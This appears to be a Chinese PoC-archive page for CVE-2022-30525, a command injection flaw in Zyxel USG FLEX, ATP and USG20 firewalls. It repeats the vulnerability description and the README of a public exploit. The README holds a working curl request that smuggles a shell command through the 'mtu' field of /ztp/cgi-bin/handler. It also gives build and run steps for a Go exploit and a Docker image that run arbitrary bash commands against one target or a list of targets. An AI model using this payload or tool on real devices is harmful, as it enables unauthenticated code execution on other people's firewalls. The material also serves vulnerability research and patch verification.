关联漏洞
标题:
合勤科技 USG FLEX 操作系统命令注入漏洞
(CVE-2022-30525)
描述:Zyxel USG FLEX是中国合勤科技(Zyxel)公司的一款防火墙。提供灵活的 VPN 选项(IPsec、SSL 或 L2TP),为远程工作和管理提供灵活的安全远程访问。 合勤科技 USG FLEX 5.00版本至5.21版本、存在安全漏洞。攻击者利用该漏洞修改特定文件,在易受攻击的设备上执行一些操作系统命令。
描述
Initial POC for the CVE-2022-30525
介绍
# CVE-2022-30525 by 1vere$k
**Rapid7** discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.
The following table contains the affected models and firmware versions.
Affected Model
USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 thru ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN ZLD5.10 thru ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800 ZLD5.10 thru ZLD5.21 Patch 1
The VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.
The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the `nobody` user. This vulnerability is exploited through the `/ztp/cgi-bin/handler` URI.
## Curl Example
```
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler
```
## Usage
There should be a `cmds` file created where you can add commands to be executed via the program in the next format:
```
bash -c "command#1 && command#2 && etc."
For example:
bash -c "ping 8.8.8.8"
```
**Golang**
```
1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build cve-2022-30525.go -o /cve-2022-30525
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]
```
**Dockerfile**
```
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525
```
Where is INPUT_FILE is a target URL or file with list of targets.
## Contact
You are free to contact me via [Keybase](https://keybase.io/1veresk) for any details.
文件快照
[4.0K] /data/pocs/78a571a986044dadb6dea6d1d06a47199277f2b8
├── [2.0K] cve-2022-30525.go
├── [ 499] Dockerfile
├── [4.0K] exploit
│ └── [1.9K] exploit.go
├── [ 30] go.mod
├── [1.0K] LICENSE
└── [2.0K] README.md
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。